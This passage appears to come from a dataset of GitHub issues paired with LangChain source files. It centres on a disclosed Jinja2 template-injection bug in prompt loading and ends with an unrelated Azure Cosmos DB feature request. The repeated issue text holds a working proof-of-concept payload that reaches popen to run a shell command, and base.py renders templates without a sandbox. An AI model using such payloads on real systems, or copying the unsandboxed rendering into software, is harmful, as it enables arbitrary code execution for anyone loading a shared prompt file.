"/".join(output_gcs[3:]) + "/" shards = _get_shards(gcs_bucket_name, gcs_prefix) docs, page_number = [], 1 for shard in shards: for page in shard.pages: docs.append( Document( page_content=_text_from_layout(page.layout, shard.text), metadata={ "page": page_number, "source": result.source_path, }, ) ) page_number += 1 yield from docs def operations_from_names(self, operation_names: List[str]) -> List["Operation"]: """Initializes Long-Running Operations from their names.""" try: from google.longrunning.operations_pb2 import ( GetOperationRequest, # type: ignore ) except ImportError: raise ImportError( "documentai package not found, please install it with" " `pip install gapic-google-longrunning`" ) operations = [] for name in operation_names: request = GetOperationRequest(name=name) operations.append(self._client.get_operation(request=request)) return operations def is_running(self, operations: List["Operation"]) -> bool: for op in operations: if not op.done(): return True return False def docai_parse( self, blobs: Sequence[Blob], *, gcs_output_path: Optional[str] = None, batch_size: int = 4000, enable_native_pdf_parsing: bool = True, ) -> List["Operation"]: """Runs Google DocAI PDF parser on a list of blobs. Args: blobs: a list of blobs to be parsed gcs_output_path: a path (folder) on GCS to store results batch_size: amount of documents per batch enable_native_pdf_parsing: a config option for the parser DocAI has a limit on the amount of documents per batch, that's why split a batch into mini-batches. Parsing is an async long-running operation on Google Cloud and results are stored in a output GCS bucket. 
""" try: from google.cloud import documentai from google.cloud.documentai_v1.types import OcrConfig, ProcessOptions except ImportError: raise ImportError( "documentai package not found, please install it with" " `pip install google-cloud-documentai`" ) if not self._processor_name: raise ValueError("Processor name is not defined, aborting!") output_path = gcs_output_path if gcs_output_path else self._gcs_output_path if output_path is None: raise ValueError("An output path on GCS should be provided!") operations = [] for batch in batch_iterate(size=batch_size, iterable=blobs): documents = [] for blob in batch: gcs_document = documentai.GcsDocument( gcs_uri=blob.path, mime_type="application/pdf" ) documents.append(gcs_document) gcs_documents = documentai.GcsDocuments(documents=documents) input_config = documentai.BatchDocumentsInputConfig( gcs_documents=gcs_documents ) gcs_output_config = documentai.DocumentOutputConfig.GcsOutputConfig( gcs_uri=output_path, field_mask=None ) output_config = documentai.DocumentOutputConfig( gcs_output_config=gcs_output_config ) if enable_native_pdf_parsing: process_options = ProcessOptions( ocr_config=OcrConfig( enable_native_pdf_parsing=enable_native_pdf_parsing ) ) else: process_options = ProcessOptions() request = documentai.BatchProcessRequest( name=self._processor_name, input_documents=input_config, document_output_config=output_config, process_options=process_options, ) operations.append(self._client.batch_process_documents(request)) return operations def get_results(self, operations: List["Operation"]) -> List[DocAIParsingResults]: try: from google.cloud.documentai_v1 import BatchProcessMetadata except ImportError: raise ImportError( "documentai package not found, please install it with" " `pip install google-cloud-documentai`" ) results = [] for op in operations: if isinstance(op.metadata, BatchProcessMetadata): metadata = op.metadata else: metadata = BatchProcessMetadata.deserialize(op.metadata.value) for status in metadata.individual_process_statuses: source = status.input_gcs_source output = status.output_gcs_destination results.append( DocAIParsingResults(source_path=source, parsed_path=output) ) return results
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info

windows 11

### Who can help?

_No response_

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

1. Save the following data to pt.json:

```json
{
    "input_variables": ["prompt"],
    "output_parser": null,
    "partial_variables": {},
    "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
    "template_format": "jinja2",
    "validate_template": true,
    "_type": "prompt"
}
```

2. Run:

```python
from langchain.prompts import load_prompt

loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```

3. The `dir` command will be executed.

Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.

Analysis: Jinja2 is used to render prompts, so template injection can happen.

Note: in pt.json, the `template` field carries the payload; the index into `__subclasses__` may differ in other environments.

### Expected behavior

Code should not be executed.
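For context, one standard mitigation for this class of Jinja2 server-side template injection is to render with Jinja2's sandboxed environment, which rejects lookups of unsafe attributes such as `__class__`. This is a general illustration of the technique, not necessarily the fix the linked PR adopted:

```python
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Shortened variant of the payload from the report above.
payload = "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__() }}"

env = SandboxedEnvironment()
try:
    env.from_string(payload).render(prompt="joke")
except SecurityError as e:
    # The sandbox blocks attribute lookups like __class__, so the
    # payload fails at render time instead of executing code.
    print(f"blocked: {e}")
```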
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/langchain/prompts/base.py
"""BasePrompt schema definition.""" from __future__ import annotations import warnings from abc import ABC from typing import Any, Callable, Dict, List, Set from langchain.schema.messages import BaseMessage, HumanMessage from langchain.schema.prompt import PromptValue from langchain.schema.prompt_template import BasePromptTemplate from langchain.utils.formatting import formatter def jinja2_formatter(template: str, **kwargs: Any) -> str: """Format a template using jinja2.""" try: from jinja2 import Template except ImportError: raise ImportError( "jinja2 not installed, which is needed to use the jinja2_formatter. " "Please install it with `pip install jinja2`." ) return Template(template).render(**kwargs) def validate_jinja2(template: str, input_variables: List[str]) -> None: """ Validate that the input variables are valid for the template. Issues a warning if missing or extra variables are found. Args: template: The template string. input_variables: The input variables. """ input_variables_set = set(input_variables) valid_variables = _get_jinja2_variables_from_template(template) missing_variables = valid_variables - input_variables_set extra_variables = input_variables_set - valid_variables warning_message = "" if missing_variables: warning_message += f"Missing variables: {missing_variables} " if extra_variables: warning_message += f"Extra variables: {extra_variables}" if warning_message: warnings.warn(warning_message.strip()) def _get_jinja2_variables_from_template(template: str) -> Set[str]: try: from jinja2 import Environment, meta except ImportError: raise ImportError( "jinja2 not installed, which is needed to use the jinja2_formatter. " "Please install it with `pip install jinja2`." ) env = Environment() ast = env.parse(template) variables = meta.find_undeclared_variables(ast) return variables DEFAULT_FORMATTER_MAPPING: Dict[str, Callable] = { "f-string": formatter.format, "jinja2": jinja2_formatter, } DEFAULT_VALIDATOR_MAPPING: Dict[str, Callable] = { "f-string": formatter.validate_input_variables, "jinja2": validate_jinja2, } def check_valid_template( template: str, template_format: str, input_variables: List[str] ) -> None: """Check that template string is valid.""" if template_format not in DEFAULT_FORMATTER_MAPPING: valid_formats = list(DEFAULT_FORMATTER_MAPPING) raise ValueError( f"Invalid template format. Got `{template_format}`;" f" should be one of {valid_formats}" ) try: validator_func = DEFAULT_VALIDATOR_MAPPING[template_format] validator_func(template, input_variables) except KeyError as e: raise ValueError( "Invalid prompt schema; check for mismatched or missing input parameters. " + str(e) ) class StringPromptValue(PromptValue): """String prompt value.""" text: str """Prompt text.""" def to_string(self) -> str: """Return prompt as string.""" return self.text def to_messages(self) -> List[BaseMessage]: """Return prompt as messages.""" return [HumanMessage(content=self.text)] class StringPromptTemplate(BasePromptTemplate, ABC): """String prompt that exposes the format method, returning a prompt.""" def format_prompt(self, **kwargs: Any) -> PromptValue: """Create Chat Messages.""" return StringPromptValue(text=self.format(**kwargs))
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info

windows 11

### Who can help?

_No response_

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

1. Save the following data to pt.json:

```json
{
    "input_variables": ["prompt"],
    "output_parser": null,
    "partial_variables": {},
    "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
    "template_format": "jinja2",
    "validate_template": true,
    "_type": "prompt"
}
```

2. Run:

```python
from langchain.prompts import load_prompt

loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```

3. The `dir` command will be executed.

Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.

Analysis: Jinja2 is used to render prompts, so template injection can happen.

Note: in pt.json, the `template` field carries the payload; the index into `__subclasses__` may differ in other environments.

### Expected behavior

Code should not be executed.
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/langchain/prompts/loading.py
"""Load prompts.""" import json import logging from pathlib import Path from typing import Callable, Dict, Union import yaml from langchain.prompts.few_shot import FewShotPromptTemplate from langchain.prompts.prompt import PromptTemplate from langchain.schema import BaseLLMOutputParser, BasePromptTemplate, StrOutputParser from langchain.utils.loading import try_load_from_hub URL_BASE = "https://raw.githubusercontent.com/hwchase17/langchain-hub/master/prompts/" logger = logging.getLogger(__name__) def load_prompt_from_config(config: dict) -> BasePromptTemplate: """Load prompt from Config Dict.""" if "_type" not in config: logger.warning("No `_type` key found, defaulting to `prompt`.") config_type = config.pop("_type", "prompt") if config_type not in type_to_loader_dict: raise ValueError(f"Loading {config_type} prompt not supported") prompt_loader = type_to_loader_dict[config_type] return prompt_loader(config) def _load_template(var_name: str, config: dict) -> dict: """Load template from the path if applicable.""" # Check if template_path exists in config. if f"{var_name}_path" in config: # If it does, make sure template variable doesn't also exist. if var_name in config: raise ValueError( f"Both `{var_name}_path` and `{var_name}` cannot be provided." ) # Pop the template path from the config. template_path = Path(config.pop(f"{var_name}_path")) # Load the template. if template_path.suffix == ".txt": with open(template_path) as f: template = f.read() else: raise ValueError # Set the template variable to the extracted variable. config[var_name] = template return config def _load_examples(config: dict) -> dict: """Load examples if necessary.""" if isinstance(config["examples"], list): pass elif isinstance(config["examples"], str): with open(config["examples"]) as f: if config["examples"].endswith(".json"): examples = json.load(f) elif config["examples"].endswith((".yaml", ".yml")): examples = yaml.safe_load(f) else: raise ValueError( "Invalid file format. Only json or yaml formats are supported." ) config["examples"] = examples else: raise ValueError("Invalid examples format. Only list or string are supported.") return config def _load_output_parser(config: dict) -> dict: """Load output parser.""" if "output_parser" in config and config["output_parser"]: _config = config.pop("output_parser") output_parser_type = _config.pop("_type") if output_parser_type == "regex_parser": from langchain.output_parsers.regex import RegexParser output_parser: BaseLLMOutputParser = RegexParser(**_config) elif output_parser_type == "default": output_parser = StrOutputParser(**_config) else: raise ValueError(f"Unsupported output parser {output_parser_type}") config["output_parser"] = output_parser return config def _load_few_shot_prompt(config: dict) -> FewShotPromptTemplate: """Load the "few shot" prompt from the config.""" # Load the suffix and prefix templates. config = _load_template("suffix", config) config = _load_template("prefix", config) # Load the example prompt. if "example_prompt_path" in config: if "example_prompt" in config: raise ValueError( "Only one of example_prompt and example_prompt_path should " "be specified." ) config["example_prompt"] = load_prompt(config.pop("example_prompt_path")) else: config["example_prompt"] = load_prompt_from_config(config["example_prompt"]) # Load the examples. 
config = _load_examples(config) config = _load_output_parser(config) return FewShotPromptTemplate(**config) def _load_prompt(config: dict) -> PromptTemplate: """Load the prompt template from config.""" # Load the template from disk if necessary. config = _load_template("template", config) config = _load_output_parser(config) return PromptTemplate(**config) def load_prompt(path: Union[str, Path]) -> BasePromptTemplate: """Unified method for loading a prompt from LangChainHub or local fs.""" if hub_result := try_load_from_hub( path, _load_prompt_from_file, "prompts", {"py", "json", "yaml"} ): return hub_result else: return _load_prompt_from_file(path) def _load_prompt_from_file(file: Union[str, Path]) -> BasePromptTemplate: """Load prompt from file.""" # Convert file to a Path object. if isinstance(file, str): file_path = Path(file) else: file_path = file # Load from either json or yaml. if file_path.suffix == ".json": with open(file_path) as f: config = json.load(f) elif file_path.suffix == ".yaml": with open(file_path, "r") as f: config = yaml.safe_load(f) else: raise ValueError(f"Got unsupported file type {file_path.suffix}") # Load the prompt from the config now. return load_prompt_from_config(config) type_to_loader_dict: Dict[str, Callable[[dict], BasePromptTemplate]] = { "prompt": _load_prompt, "few_shot": _load_few_shot_prompt, }
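A quick sketch of the config-driven path above, runnable with just this module (the template itself is an illustrative trusted f-string):

```python
from langchain.prompts.loading import load_prompt_from_config

config = {
    "_type": "prompt",
    "input_variables": ["adjective", "content"],
    "template": "Tell me a {adjective} joke about {content}.",
}

# "_type" is popped, then the dict is dispatched to _load_prompt,
# which builds a PromptTemplate from the remaining keys.
prompt = load_prompt_from_config(config)
print(prompt.format(adjective="funny", content="chickens"))
```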
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info

windows 11

### Who can help?

_No response_

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

1. Save the following data to pt.json:

```json
{
    "input_variables": ["prompt"],
    "output_parser": null,
    "partial_variables": {},
    "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
    "template_format": "jinja2",
    "validate_template": true,
    "_type": "prompt"
}
```

2. Run:

```python
from langchain.prompts import load_prompt

loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```

3. The `dir` command will be executed.

Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.

Analysis: Jinja2 is used to render prompts, so template injection can happen.

Note: in pt.json, the `template` field carries the payload; the index into `__subclasses__` may differ in other environments.

### Expected behavior

Code should not be executed.
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/langchain/prompts/prompt.py
"""Prompt schema definition.""" from __future__ import annotations from pathlib import Path from string import Formatter from typing import Any, Dict, List, Optional, Union from langchain.prompts.base import ( DEFAULT_FORMATTER_MAPPING, StringPromptTemplate, _get_jinja2_variables_from_template, check_valid_template, ) from langchain.pydantic_v1 import root_validator class PromptTemplate(StringPromptTemplate): """A prompt template for a language model. A prompt template consists of a string template. It accepts a set of parameters from the user that can be used to generate a prompt for a language model. The template can be formatted using either f-strings (default) or jinja2 syntax. Example: .. code-block:: python from langchain.prompts import PromptTemplate # Instantiation using from_template (recommended) prompt = PromptTemplate.from_template("Say {foo}") prompt.format(foo="bar") # Instantiation using initializer prompt = PromptTemplate(input_variables=["foo"], template="Say {foo}") """ @property def lc_attributes(self) -> Dict[str, Any]: return { "template_format": self.template_format, } input_variables: List[str] """A list of the names of the variables the prompt template expects.""" template: str """The prompt template.""" template_format: str = "f-string" """The format of the prompt template. Options are: 'f-string', 'jinja2'.""" validate_template: bool = True """Whether or not to try validating the template.""" def __add__(self, other: Any) -> PromptTemplate: """Override the + operator to allow for combining prompt templates.""" # Allow for easy combining if isinstance(other, PromptTemplate): if self.template_format != "f-string": raise ValueError( "Adding prompt templates only supported for f-strings." ) if other.template_format != "f-string": raise ValueError( "Adding prompt templates only supported for f-strings." ) input_variables = list( set(self.input_variables) | set(other.input_variables) ) template = self.template + other.template # If any do not want to validate, then don't validate_template = self.validate_template and other.validate_template partial_variables = {k: v for k, v in self.partial_variables.items()} for k, v in other.partial_variables.items(): if k in partial_variables: raise ValueError("Cannot have same variable partialed twice.") else: partial_variables[k] = v return PromptTemplate( template=template, input_variables=input_variables, partial_variables=partial_variables, template_format="f-string", validate_template=validate_template, ) elif isinstance(other, str): prompt = PromptTemplate.from_template(other) return self + prompt else: raise NotImplementedError(f"Unsupported operand type for +: {type(other)}") @property def _prompt_type(self) -> str: """Return the prompt type key.""" return "prompt" def format(self, **kwargs: Any) -> str: """Format the prompt with the inputs. Args: kwargs: Any arguments to be passed to the prompt template. Returns: A formatted string. Example: .. 
code-block:: python prompt.format(variable1="foo") """ kwargs = self._merge_partial_and_user_variables(**kwargs) return DEFAULT_FORMATTER_MAPPING[self.template_format](self.template, **kwargs) @root_validator() def template_is_valid(cls, values: Dict) -> Dict: """Check that template and input variables are consistent.""" if values["validate_template"]: all_inputs = values["input_variables"] + list(values["partial_variables"]) check_valid_template( values["template"], values["template_format"], all_inputs ) return values @classmethod def from_examples( cls, examples: List[str], suffix: str, input_variables: List[str], example_separator: str = "\n\n", prefix: str = "", **kwargs: Any, ) -> PromptTemplate: """Take examples in list format with prefix and suffix to create a prompt. Intended to be used as a way to dynamically create a prompt from examples. Args: examples: List of examples to use in the prompt. suffix: String to go after the list of examples. Should generally set up the user's input. input_variables: A list of variable names the final prompt template will expect. example_separator: The separator to use in between examples. Defaults to two new line characters. prefix: String that should go before any examples. Generally includes examples. Default to an empty string. Returns: The final prompt generated. """ template = example_separator.join([prefix, *examples, suffix]) return cls(input_variables=input_variables, template=template, **kwargs) @classmethod def from_file( cls, template_file: Union[str, Path], input_variables: List[str], **kwargs: Any ) -> PromptTemplate: """Load a prompt from a file. Args: template_file: The path to the file containing the prompt template. input_variables: A list of variable names the final prompt template will expect. Returns: The prompt loaded from the file. """ with open(str(template_file), "r") as f: template = f.read() return cls(input_variables=input_variables, template=template, **kwargs) @classmethod def from_template( cls, template: str, *, template_format: str = "f-string", partial_variables: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> PromptTemplate: """Load a prompt template from a template. Args: template: The template to load. template_format: The format of the template. Use `jinja2` for jinja2, and `f-string` or None for f-strings. partial_variables: A dictionary of variables that can be used to partially fill in the template. For example, if the template is `"{variable1} {variable2}"`, and `partial_variables` is `{"variable1": "foo"}`, then the final prompt will be `"foo {variable2}"`. Returns: The prompt template loaded from the template. """ if template_format == "jinja2": # Get the variables for the template input_variables = _get_jinja2_variables_from_template(template) elif template_format == "f-string": input_variables = { v for _, v, _, _ in Formatter().parse(template) if v is not None } else: raise ValueError(f"Unsupported template format: {template_format}") _partial_variables = partial_variables or {} if _partial_variables: input_variables = { var for var in input_variables if var not in _partial_variables } return cls( input_variables=sorted(input_variables), template=template, template_format=template_format, partial_variables=_partial_variables, **kwargs, ) # For backwards compatibility. Prompt = PromptTemplate
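A short, runnable illustration of the variable inference in `from_template` above (safe here because the templates are trusted literals):

```python
from langchain.prompts import PromptTemplate

# jinja2 templates get their input variables inferred automatically:
prompt = PromptTemplate.from_template(
    "Tell me a {{ adjective }} joke about {{ content }}.",
    template_format="jinja2",
)
print(prompt.input_variables)  # ['adjective', 'content']

# partial_variables are removed from input_variables up front:
partial = PromptTemplate.from_template(
    "{variable1} {variable2}",
    partial_variables={"variable1": "foo"},
)
print(partial.input_variables)  # ['variable2']
print(partial.format(variable2="bar"))  # "foo bar"
```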
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info

windows 11

### Who can help?

_No response_

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

1. Save the following data to pt.json:

```json
{
    "input_variables": ["prompt"],
    "output_parser": null,
    "partial_variables": {},
    "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
    "template_format": "jinja2",
    "validate_template": true,
    "_type": "prompt"
}
```

2. Run:

```python
from langchain.prompts import load_prompt

loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```

3. The `dir` command will be executed.

Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.

Analysis: Jinja2 is used to render prompts, so template injection can happen.

Note: in pt.json, the `template` field carries the payload; the index into `__subclasses__` may differ in other environments.

### Expected behavior

Code should not be executed.
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/tests/unit_tests/examples/jinja_injection_prompt.json
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info

windows 11

### Who can help?

_No response_

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

1. Save the following data to pt.json:

```json
{
    "input_variables": ["prompt"],
    "output_parser": null,
    "partial_variables": {},
    "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
    "template_format": "jinja2",
    "validate_template": true,
    "_type": "prompt"
}
```

2. Run:

```python
from langchain.prompts import load_prompt

loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```

3. The `dir` command will be executed.

Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.

Analysis: Jinja2 is used to render prompts, so template injection can happen.

Note: in pt.json, the `template` field carries the payload; the index into `__subclasses__` may differ in other environments.

### Expected behavior

Code should not be executed.
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/tests/unit_tests/examples/jinja_injection_prompt.yaml
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info

windows 11

### Who can help?

_No response_

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

1. Save the following data to pt.json:

```json
{
    "input_variables": ["prompt"],
    "output_parser": null,
    "partial_variables": {},
    "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
    "template_format": "jinja2",
    "validate_template": true,
    "_type": "prompt"
}
```

2. Run:

```python
from langchain.prompts import load_prompt

loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```

3. The `dir` command will be executed.

Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.

Analysis: Jinja2 is used to render prompts, so template injection can happen.

Note: in pt.json, the `template` field carries the payload; the index into `__subclasses__` may differ in other environments.

### Expected behavior

Code should not be executed.
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/tests/unit_tests/prompts/test_loading.py
"""Test loading functionality.""" import os from contextlib import contextmanager from pathlib import Path from typing import Iterator from langchain.output_parsers import RegexParser from langchain.prompts.few_shot import FewShotPromptTemplate from langchain.prompts.loading import load_prompt from langchain.prompts.prompt import PromptTemplate EXAMPLE_DIR = Path("tests/unit_tests/examples").absolute() @contextmanager def change_directory(dir: Path) -> Iterator: """Change the working directory to the right folder.""" origin = Path().absolute() try: os.chdir(dir) yield finally: os.chdir(origin) def test_loading_from_YAML() -> None: """Test loading from yaml file.""" prompt = load_prompt(EXAMPLE_DIR / "simple_prompt.yaml") expected_prompt = PromptTemplate( input_variables=["adjective", "content"], template="Tell me a {adjective} joke about {content}.", ) assert prompt == expected_prompt def test_loading_from_JSON() -> None: """Test loading from json file.""" prompt = load_prompt(EXAMPLE_DIR / "simple_prompt.json") expected_prompt = PromptTemplate( input_variables=["adjective", "content"], template="Tell me a {adjective} joke about {content}.", ) assert prompt == expected_prompt def test_saving_loading_round_trip(tmp_path: Path) -> None: """Test equality when saving and loading a prompt.""" simple_prompt = PromptTemplate( input_variables=["adjective", "content"], template="Tell me a {adjective} joke about {content}.", ) simple_prompt.save(file_path=tmp_path / "prompt.yaml") loaded_prompt = load_prompt(tmp_path / "prompt.yaml") assert loaded_prompt == simple_prompt few_shot_prompt = FewShotPromptTemplate( input_variables=["adjective"], prefix="Write antonyms for the following words.", example_prompt=PromptTemplate( input_variables=["input", "output"], template="Input: {input}\nOutput: {output}", ), examples=[ {"input": "happy", "output": "sad"}, {"input": "tall", "output": "short"}, ], suffix="Input: {adjective}\nOutput:", ) few_shot_prompt.save(file_path=tmp_path / "few_shot.yaml") loaded_prompt = load_prompt(tmp_path / "few_shot.yaml") assert loaded_prompt == few_shot_prompt def test_loading_with_template_as_file() -> None: """Test loading when the template is a file.""" with change_directory(EXAMPLE_DIR): prompt = load_prompt("simple_prompt_with_template_file.json") expected_prompt = PromptTemplate( input_variables=["adjective", "content"], template="Tell me a {adjective} joke about {content}.", ) assert prompt == expected_prompt def test_loading_few_shot_prompt_from_yaml() -> None: """Test loading few shot prompt from yaml.""" with change_directory(EXAMPLE_DIR): prompt = load_prompt("few_shot_prompt.yaml") expected_prompt = FewShotPromptTemplate( input_variables=["adjective"], prefix="Write antonyms for the following words.", example_prompt=PromptTemplate( input_variables=["input", "output"], template="Input: {input}\nOutput: {output}", ), examples=[ {"input": "happy", "output": "sad"}, {"input": "tall", "output": "short"}, ], suffix="Input: {adjective}\nOutput:", ) assert prompt == expected_prompt def test_loading_few_shot_prompt_from_json() -> None: """Test loading few shot prompt from json.""" with change_directory(EXAMPLE_DIR): prompt = load_prompt("few_shot_prompt.json") expected_prompt = FewShotPromptTemplate( input_variables=["adjective"], prefix="Write antonyms for the following words.", example_prompt=PromptTemplate( input_variables=["input", "output"], template="Input: {input}\nOutput: {output}", ), examples=[ {"input": "happy", "output": "sad"}, {"input": "tall", "output": 
"short"}, ], suffix="Input: {adjective}\nOutput:", ) assert prompt == expected_prompt def test_loading_few_shot_prompt_when_examples_in_config() -> None: """Test loading few shot prompt when the examples are in the config.""" with change_directory(EXAMPLE_DIR): prompt = load_prompt("few_shot_prompt_examples_in.json") expected_prompt = FewShotPromptTemplate( input_variables=["adjective"], prefix="Write antonyms for the following words.", example_prompt=PromptTemplate( input_variables=["input", "output"], template="Input: {input}\nOutput: {output}", ), examples=[ {"input": "happy", "output": "sad"}, {"input": "tall", "output": "short"}, ], suffix="Input: {adjective}\nOutput:", ) assert prompt == expected_prompt def test_loading_few_shot_prompt_example_prompt() -> None: """Test loading few shot when the example prompt is in its own file.""" with change_directory(EXAMPLE_DIR): prompt = load_prompt("few_shot_prompt_example_prompt.json") expected_prompt = FewShotPromptTemplate( input_variables=["adjective"], prefix="Write antonyms for the following words.", example_prompt=PromptTemplate( input_variables=["input", "output"], template="Input: {input}\nOutput: {output}", ), examples=[ {"input": "happy", "output": "sad"}, {"input": "tall", "output": "short"}, ], suffix="Input: {adjective}\nOutput:", ) assert prompt == expected_prompt def test_loading_with_output_parser() -> None: with change_directory(EXAMPLE_DIR): prompt = load_prompt("prompt_with_output_parser.json") expected_template = "Given the following question and student answer, provide a correct answer and score the student answer.\nQuestion: {question}\nStudent Answer: {student_answer}\nCorrect Answer:" # noqa: E501 expected_prompt = PromptTemplate( input_variables=["question", "student_answer"], output_parser=RegexParser( regex="(.*?)\nScore: (.*)", output_keys=["answer", "score"], ), template=expected_template, ) assert prompt == expected_prompt
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request

Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR adds support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.

[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)

### Motivation

The capability described in this feature request is currently not available for LangChain Python.

### Your contribution

I will be submitting a PR for this feature request.
